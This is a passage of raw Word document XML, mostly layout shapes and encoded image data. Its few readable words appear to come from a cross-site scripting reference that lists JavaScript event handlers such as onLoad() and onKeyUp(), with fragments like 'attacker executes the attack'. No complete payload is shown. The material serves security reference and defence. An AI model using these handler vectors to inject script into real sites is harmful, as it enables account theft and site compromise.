                <v:shape id="Freeform 1015" o:spid="_x0000_s1420" style="position:absolute;left:1930;top:154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0ZMUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZYRepG5ioTQxGzEWaQ+9mIbicciO&#10;STA7G7JbTf99t1DwNo/3Odl2Mr240ug6ywriVQSCuLa640ZB9Xl4fAHhPLLG3jIp+CEH23w+yzDV&#10;9sZHupa+ESGEXYoKWu+HVEpXt2TQrexAHLizHQ36AMdG6hFvIdz0ch1Fz9Jgx6GhxYH2LdWX8tso&#10;+Chem+Tw9eZPcl0ly8upQF0flXpYTLsNCE+Tv4v/3e86zI/iJ/j7Jpw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2HRkxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,336;21,336;18,336;0,315;0,312;0,175;21,154;805,154;826,175;826,315;809,336;805,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1014" o:spid="_x0000_s1421" type="#_x0000_t202" style="position:absolute;left:1930;top:154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rxZsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYQq9aaIUsVujSKkgCMV1e+hxuhl3&#10;g5vJdhN1/feNIHibx/uc+bJ3jThTF6xnDeORAkFcemO50vBdrIczECEiG2w8k4YrBVgungZzzIy/&#10;cE7nfaxECuGQoYY6xjaTMpQ1OQwj3xIn7uA7hzHBrpKmw0sKd42cKDWVDi2nhhpb+qipPO5PTsPq&#10;h/NP+/f1u8sPuS2KN8Xb6VHrl+d+9Q4iUh8f4rt7Y9J8NX6F2zfp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rxZ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onKeyUp()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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>releases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8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>key)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2094"/>
          <w:tab w:val="left" w:pos="2096"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="2095" w:hanging="1906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702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1003300" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1009" name="Group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3300" cy="116205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1580" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1010" name="Freeform 1012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1580" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3489 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1580"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1580"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1580"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1580"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1580"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1580"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1580"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3489 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1580"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3510 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1580"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3510 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1580"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3492 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1580"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3489 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1580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80" h="183">
                                <a:moveTo>
                                  <a:pt x="155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559" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1562" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="155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" name="Text Box 101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158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onLayoutComplete()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0" o:spid="_x0000_s1422" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:79pt;height:9.15pt;z-index:-17619456;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="158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">
                <v:shape id="Freeform 1012" o:spid="_x0000_s1423" style="position:absolute;left:1930;top:166;width:1580;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="158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hW9sMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvDMAyF74P+B6PCbqvTDsbI6pbSMtitrM3uWqwl&#10;obGc2lqa/fvpMNhN4j2992m9nUJvRkq5i+xguSjAENfRd9w4qM6vD89gsiB77COTgx/KsN3M7tZY&#10;+njjdxpP0hgN4Vyig1ZkKK3NdUsB8yIOxKp9xRRQdE2N9QlvGh56uyqKJxuwY21ocaB9S/Xl9B0c&#10;pJXEz8fhKEf86A6jra7nuro6dz+fdi9ghCb5N/9dv3nFL5bKr9/oCHb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hW9sMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1559,182l21,182r-3,l,161r,-3l,21,21,,1559,r21,21l1580,161r-18,21l1559,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1559,348;21,348;18,348;0,327;0,324;0,187;21,166;1559,166;1580,187;1580,327;1562,348;1559,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1011" o:spid="_x0000_s1424" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:158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1S/sMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQRvNdkexK5GEbFQKIjr9tDjuBl3&#10;g5vJdpPq+u9NodDbPN7nLNeDa8WV+mA9a8imCgRx5Y3lWsNn+fY8BxEissHWM2m4U4D1avS0xNz4&#10;Gxd0PcZapBAOOWpoYuxyKUPVkMMw9R1x4s6+dxgT7GtperylcNfKF6Vm0qHl1NBgR9uGqsvxx2nY&#10;fHGxs9/706E4F7YsXxV/zC5aT8bDZgEi0hD/xX/ud5PmqyyD32/SC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1S/s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onLayoutComplete()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5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>preview)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252"/>
          <w:tab w:val="left" w:pos="1253"/>
        </w:tabs>
        <w:ind w:left="1252" w:hanging="1063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753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471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1006" name="Group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154"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1007" name="Freeform 1009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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742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Text Box 100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onLoad()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7" o:spid="_x0000_s1425" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:37.1pt;height:9.15pt;z-index:-17618944;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 1009" o:spid="_x0000_s1426" style="position:absolute;left:1930;top:154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NVDcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPzWrCQBC+F/oOyxS8FN2Nh1ajayiFohZBNHmAITsm&#10;wexsyG5jfHu3UOhtPr7fWWejbcVAvW8ca0hmCgRx6UzDlYYi/5ouQPiAbLB1TBru5CHbPD+tMTXu&#10;xicazqESMYR9ihrqELpUSl/WZNHPXEccuYvrLYYI+0qaHm8x3LZyrtSbtNhwbKixo8+ayuv5x2rY&#10;7g+tHwvc2RyXyffxqg7Dq9J68jJ+rEAEGsO/+M+9M3G+Uu/w+008QW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NVDcMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,336;21,336;18,336;0,315;0,312;0,175;21,154;720,154;741,175;741,315;723,336;720,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1008" o:spid="_x0000_s1427" type="#_x0000_t202" style="position:absolute;left:1930;top:154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5tvsYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvDMAyF74P9B6PBbqvdHUqb1i2lbDAYjKXZYUc1&#10;VhPTWM5ir83+/XQo9Cbxnt77tNqMoVNnGpKPbGE6MaCI6+g8Nxa+qtenOaiUkR12kcnCHyXYrO/v&#10;Vli4eOGSzvvcKAnhVKCFNue+0DrVLQVMk9gTi3aMQ8As69BoN+BFwkOnn42Z6YCepaHFnnYt1af9&#10;b7Cw/ebyxf98HD7LY+mramH4fXay9vFh3C5BZRrzzXy9fnOCb4zgyj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5tvsYAAADd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onLoad()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00320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321945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1003" name="Group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8995" cy="116205"/>
                          <a:chOff x="1930" y="507"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1004" name="Freeform 1006"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="506"/>
                            <a:ext cx="1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 689 507"/>
                              <a:gd name="T3" fmla="*/ 689 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 689 507"/>
                              <a:gd name="T7" fmla="*/ 689 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 688 507"/>
                              <a:gd name="T11" fmla="*/ 688 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 668 507"/>
                              <a:gd name="T15" fmla="*/ 668 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 665 507"/>
                              <a:gd name="T19" fmla="*/ 665 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 528 507"/>
                              <a:gd name="T23" fmla="*/ 528 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 507 507"/>
                              <a:gd name="T27" fmla="*/ 507 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 507 507"/>
                              <a:gd name="T31" fmla="*/ 507 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 528 507"/>
                              <a:gd name="T35" fmla="*/ 528 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 668 507"/>
                              <a:gd name="T39" fmla="*/ 668 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 688 507"/>
                              <a:gd name="T43" fmla="*/ 688 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337"/>
                              <a:gd name="T46" fmla="+- 0 689 507"/>
                              <a:gd name="T47" fmla="*/ 6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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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Text Box 100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06"/>
                            <a:ext cx="133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onLoseCapture()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4" o:spid="_x0000_s1428" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:25.35pt;width:66.85pt;height:9.15pt;z-index:15800320;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,507" coordsize="133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">
                <v:shape id="Freeform 1006" o:spid="_x0000_s1429" style="position:absolute;left:1930;top:506;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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uT+MYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2sCMRC+F/wPYYReSk0spZXVKPVREDyUbqXgbdiM&#10;u7GbybKJuvrrTaHQ23x8z5nMOleLE7XBetYwHCgQxIU3lksN26/3xxGIEJEN1p5Jw4UCzKa9uwlm&#10;xp/5k055LEUK4ZChhirGJpMyFBU5DAPfECdu71uHMcG2lKbFcwp3tXxS6kU6tJwaKmxoUVHxkx+d&#10;htXuezu0h033Wi7yDzu6PFznS9L6vt+9jUFE6uK/+M+9Nmm+Us/w+006QU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uT+MYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1316,182l21,182r-3,-1l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,20l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,689;21,689;18,688;0,668;0,665;0,528;21,507;1316,507;1337,528;1337,668;1319,688;1316,689" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1005" o:spid="_x0000_s1430" type="#_x0000_t202" style="position:absolute;left:1930;top:506;width:133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/CIMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTeamKhUlejiFgoFIrrevA4bsbd&#10;4GayblLd/vtGKHibx/uc+bJ3jbhSF6xnDeORAkFcemO50rAvPl7eQYSIbLDxTBp+KcByMXiaY2b8&#10;jXO67mIlUgiHDDXUMbaZlKGsyWEY+ZY4cSffOYwJdpU0Hd5SuGvkq1IT6dByaqixpXVN5Xn34zSs&#10;Dpxv7OX7uM1PuS2KqeKvyVnr52G/moGI1MeH+N/9adJ8pd7g/k06QS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/CIM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onLoseCapture()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00832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3231515</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>321945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="902970" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1000" name="Group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2970" cy="116205"/>
                          <a:chOff x="5089" y="507"/>
                          <a:chExt cx="1422" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1001" name="Freeform 1003"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="5089" y="506"/>
                            <a:ext cx="1422" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6490 5089"/>
                              <a:gd name="T1" fmla="*/ T0 w 1422"/>
                              <a:gd name="T2" fmla="+- 0 689 507"/>
                              <a:gd name="T3" fmla="*/ 689 h 183"/>
                              <a:gd name="T4" fmla="+- 0 5110 5089"/>
                              <a:gd name="T5" fmla="*/ T4 w 1422"/>
                              <a:gd name="T6" fmla="+- 0 689 507"/>
                              <a:gd name="T7" fmla="*/ 689 h 183"/>
                              <a:gd name="T8" fmla="+- 0 5107 5089"/>
                              <a:gd name="T9" fmla="*/ T8 w 1422"/>
                              <a:gd name="T10" fmla="+- 0 688 507"/>
                              <a:gd name="T11" fmla="*/ 688 h 183"/>
                              <a:gd name="T12" fmla="+- 0 5089 5089"/>
                              <a:gd name="T13" fmla="*/ T12 w 1422"/>
                              <a:gd name="T14" fmla="+- 0 668 507"/>
                              <a:gd name="T15" fmla="*/ 668 h 183"/>
                              <a:gd name="T16" fmla="+- 0 5089 5089"/>
                              <a:gd name="T17" fmla="*/ T16 w 1422"/>
                              <a:gd name="T18" fmla="+- 0 665 507"/>
                              <a:gd name="T19" fmla="*/ 665 h 183"/>
                              <a:gd name="T20" fmla="+- 0 5089 5089"/>
                              <a:gd name="T21" fmla="*/ T20 w 1422"/>
                              <a:gd name="T22" fmla="+- 0 528 507"/>
                              <a:gd name="T23" fmla="*/ 528 h 183"/>
                              <a:gd name="T24" fmla="+- 0 5110 5089"/>
                              <a:gd name="T25" fmla="*/ T24 w 1422"/>
                              <a:gd name="T26" fmla="+- 0 507 507"/>
                              <a:gd name="T27" fmla="*/ 507 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6490 5089"/>
                              <a:gd name="T29" fmla="*/ T28 w 1422"/>
                              <a:gd name="T30" fmla="+- 0 507 507"/>
                              <a:gd name="T31" fmla="*/ 507 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6511 5089"/>
                              <a:gd name="T33" fmla="*/ T32 w 1422"/>
                              <a:gd name="T34" fmla="+- 0 528 507"/>
                              <a:gd name="T35" fmla="*/ 528 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6511 5089"/>
                              <a:gd name="T37" fmla="*/ T36 w 1422"/>
                              <a:gd name="T38" fmla="+- 0 668 507"/>
                              <a:gd name="T39" fmla="*/ 668 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6493 5089"/>
                              <a:gd name="T41" fmla="*/ T40 w 1422"/>
                              <a:gd name="T42" fmla="+- 0 688 507"/>
                              <a:gd name="T43" fmla="*/ 688 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6490 5089"/>
                              <a:gd name="T45" fmla="*/ T44 w 1422"/>
                              <a:gd name="T46" fmla="+- 0 689 507"/>
                              <a:gd name="T47" fmla="*/ 6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22" h="183">
                                <a:moveTo>
                                  <a:pt x="140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401" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1422" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1422" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1404" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140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Text Box 1002"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="5089" y="506"/>
                            <a:ext cx="142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1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releaseCapture()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1" o:spid="_x0000_s1431" style="position:absolute;left:0;text-align:left;margin-left:254.45pt;margin-top:25.35pt;width:71.1pt;height:9.15pt;z-index:15800832;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="5089,507" coordsize="142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">
                <v:shape id="Freeform 1003" o:spid="_x0000_s1432" style="position:absolute;left:5089;top:506;width:1422;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="142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3mMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywje6m6KFImuoRQKwZ6qHvQ2ZKdJ&#10;aHZ2m11j9Nd3C4K3ebzPWRej7cRAfWgda8jmCgRx5UzLtYbD/uN5CSJEZIOdY9JwpQDFZvK0xty4&#10;C3/RsIu1SCEcctTQxOhzKUPVkMUwd544cd+utxgT7GtperykcNvJF6VepcWWU0ODnt4bqn52Z6th&#10;e94uhpNXoy/bYyw/b1iV+1+tZ9PxbQUi0hgf4ru7NGm+Uhn8f5NO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3mMMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1401,182l21,182r-3,-1l,161r,-3l,21,21,,1401,r21,21l1422,161r-18,20l1401,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1401,689;21,689;18,688;0,668;0,665;0,528;21,507;1401,507;1422,528;1422,668;1404,688;1401,689" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1002" o:spid="_x0000_s1433" type="#_x0000_t202" style="position:absolute;left:5089;top:506;width:142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ZaVMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTeaqIH0a1RRCwUCsV1PXicbsbd&#10;4GayblLd/vtGELzN433OYtW7RlypC9azhvFIgSAuvbFcaTgUH28zECEiG2w8k4Y/CrBaDl4WmBl/&#10;45yu+1iJFMIhQw11jG0mZShrchhGviVO3Ml3DmOCXSVNh7cU7ho5UWoqHVpODTW2tKmpPO9/nYb1&#10;kfOtvXz/7PJTbotirvhretb6ddiv30FE6uNT/HB/mjRfqQncv0kn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ZaVMMAAADd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1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releaseCapture()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(attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>executes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
